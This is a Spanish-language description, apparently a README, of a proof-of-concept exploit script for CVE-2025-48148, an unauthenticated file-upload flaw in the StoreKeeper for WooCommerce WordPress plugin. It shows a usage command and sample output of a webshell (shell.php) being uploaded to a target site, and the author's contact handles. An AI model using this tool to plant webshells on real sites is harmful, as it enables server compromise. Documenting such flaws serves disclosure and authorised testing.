
StoreKeeper for WooCommerce <= 14.4.4 - Subida de archivos arbitraria sin autenticación
StoreKeeper for WooCommerce <= 14.4.4 - Carga arbitraria de archivos sin autenticación
El plugin StoreKeeper for WooCommerce para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de validación del tipo de archivo en todas las versiones hasta la 14.4.4 inclusive.
Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor del sitio afectado, lo que potencialmente conduce a la ejecución remota de código.
Nombre del script: CVE-2025-48148.py
Este script es un exploit de prueba de concepto profesional para CVE-2025-48148, diseñado para automatizar el proceso de carga de una webshell en sitios WordPress vulnerables que utilizan el plugin StoreKeeper for WooCommerce.
nonce requerido directamente de la URL objetivo, garantizando fiabilidad incluso si el valor cambia.python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
Opciones:
--debug Activa la salida verbosa.--insecure Omite la verificación del certificado SSL.Ejemplo:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 Correo electrónico: [email protected]
📨 Telegram: @Kxploit
Este script se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas.
El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Siempre obtenga el permiso adecuado antes de probar cualquier sistema.
Por: Nxploited ( Khaled Alenazi )